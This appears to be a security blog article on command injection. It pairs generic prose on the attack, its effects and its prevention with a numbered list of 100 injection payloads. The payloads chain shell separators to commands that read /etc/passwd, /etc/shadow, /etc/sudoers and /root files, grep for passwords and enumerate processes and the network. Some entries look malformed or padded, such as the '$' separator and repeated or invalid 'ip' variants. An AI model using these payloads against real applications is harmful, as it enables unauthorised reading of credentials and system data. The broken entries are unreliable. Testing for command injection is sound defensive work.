Command injection is an attack in which the goal is to execute system commands on a host machine through a vulnerable application. It is one of the most common web application vulnerabilities and occurs when untrusted data is sent to an interpreter as part of a command or query.
What is Command Injection?
Command injection is a type of attack in which an attacker is able to execute arbitrary system commands on a vulnerable host system. The attacker is able to inject malicious commands into an application, which are then executed on the host. Command injection is one of the most common web application vulnerabilities and can potentially lead to serious consequences such as data leakage, privilege escalation, and system compromise.
2. How Does Command Injection Work?
Command injection attacks occur when an application passes untrusted data to an interpreter as part of a command or query. The attacker injects malicious commands into the application, which are then executed on the host system. This can be done through user input fields, file uploads, and other vulnerable areas of the application.
3. What Are the Effects of Command Injection?
Command injection attacks can have serious consequences ranging from data leakage, privilege escalation, and system compromise. Command injection can also be used to gain access to sensitive data, execute malicious code, and launch denial of service attacks.
4. How Can You Prevent Command Injection?
In order to prevent command injection attacks, it is important to properly validate user input. All user input should be sanitized and filtered to ensure that it does not contain any malicious code. It is also important to limit the privileges of the application so that it cannot execute commands that could potentially be used in an attack. Finally, it is important to perform regular security audits in order to identify any potential vulnerabilities.
How to Find Command injection
The most effective way to find command injection vulnerabilities is to perform a comprehensive security audit of the web application. During the audit, security professionals should look for any areas of the application where user input is accepted and then passed to an interpreter. These areas should be closely examined to ensure that they are properly sanitized and filtered to prevent malicious code from being injected. Additionally, security professionals should look for any areas of the application where privileged commands can be executed. These areas should be closely monitored and any suspicious activity should be investigated.
Parameters To Find Command Injection
When searching for command injection vulnerabilities, it is important to consider the following parameters:
1. User Input: All user input should be carefully examined to ensure that it does not contain any malicious code.
2. Privileged Commands: Security professionals should look for any areas of the application where privileged commands can be executed. Any suspicious activity should be investigated.
3. Authentication: Authentication should be used to ensure that only authorized users are able to access sensitive areas of the application.
4. Logging: Logging should be enabled to monitor all activity on the system and identify any potential attacks.
5. Encryption: Encryption should be used to protect sensitive data and communications.
100 Command Injection Payloads
1. ;cat /etc/passwd 2. & whoami 3. | wc -l 4. && ls -al 5. $ ls -lah 6. ; ls -al 7. | grep -i password 8. & find / -type f -name “*.conf” 9. | find / -name “*.txt” 10. && find / -type f -name “*.log” 11. $ sort /etc/passwd 12. ; sort /etc/shadow 13. & cat /proc/version 14. | cat /etc/issue 15. && cat /etc/hosts 16. $ cat /etc/resolv.conf 17. ; echo “test” 18. & echo “test” > /tmp/test.txt 19. | ps aux 20. && ps -ef 21. $ netstat -anp 22. ; netstat -tulpn 23. & who 24. | whoami 25. && env 26. $ env | grep -i path 27. ; cat /etc/services 28. & cat /etc/group 29. | cat /root/.bashrc 30. && cat /root/.profile 31. $ cat /etc/sudoers 32. ; ls -alh /etc/ssh 33. & ls -alh /root 34. | ls -alh /home 35. && ls -alh /var/log 36. $ cat /proc/cpuinfo 37. ; cat /proc/meminfo 38. & cat /proc/loadavg 39. | cat /proc/stat 40. && cat /proc/net/dev 41. $ cat /proc/net/arp 42. ; cat /proc/net/route 43. & cat /proc/net/ip_mr_cache 44. | cat /proc/net/ip_conntrack 45. && cat /proc/net/ipv6_route 46. $ cat /proc/net/ipv6_mr_cache 47. ; cat /proc/net/ipv6_conntrack 48. & cat /proc/net/icmp 49. | cat /proc/net/igmp 50. && cat /proc/net/raw 51. $ cat /proc/net/raw6 52. ; cat /proc/net/udp 53. & cat /proc/net/udp6 54. | cat /proc/net/tcp 55. && cat /proc/net/tcp6 56. $ cat /proc/sys/net/ipv4/ip_forward 57. ; cat /proc/sys/net/ipv4/conf/all/rp_filter 58. & cat /proc/sys/net/ipv4/icmp_echo_ignore_all 59. | cat /proc/sys/net/ipv6/conf/all/disable_ipv6 60. && cat /proc/sys/net/ipv6/conf/default/disable_ipv6 61. $ cat /proc/sys/net/ipv4/conf/default/accept_redirects 62. ; cat /proc/sys/net/ipv4/conf/all/accept_source_route 63. & cat /proc/sys/net/ipv6/conf/default/accept_redirects 64. | cat /proc/sys/net/ipv6/conf/all/accept_source_route 65. && ip route show 66. $ ip route show table all 67. ; ip route show table local 68. & ip route show table main 69. | ip route show table default 70. && ip rule show 71. $ ip -6 rule show 72. ; ip -6 route show table main 73. & ip -6 route show table local 74. | ip -6 route show table default 75. && ip -s link 76. $ ip -s addr 77. ; ip -s route 78. & ip -s neigh 79. | ip -s rule 80. && ip -s maddr 81. $ ip -s mroute 82. ; ip -s mrule 83. & ip -6 tunnel show 84. | ip -6 tunnel show table 85. && ip -6 tunnel show table main 86. $ ip -6 tunnel show table local 87. ; ip -6 tunnel show table default 88. & ip -6 tunnel show table all 89. | ip link show 90. && ip addr show 91. $ ip route show 92. ; ip route show table 93. & ip neigh show 94. | ip rule show 95. && ip maddr show 96. $ ip mroute show 97. ; ip mrule show 98. & ip -s link show 99. | ip -s addr show 100. && ip -s route show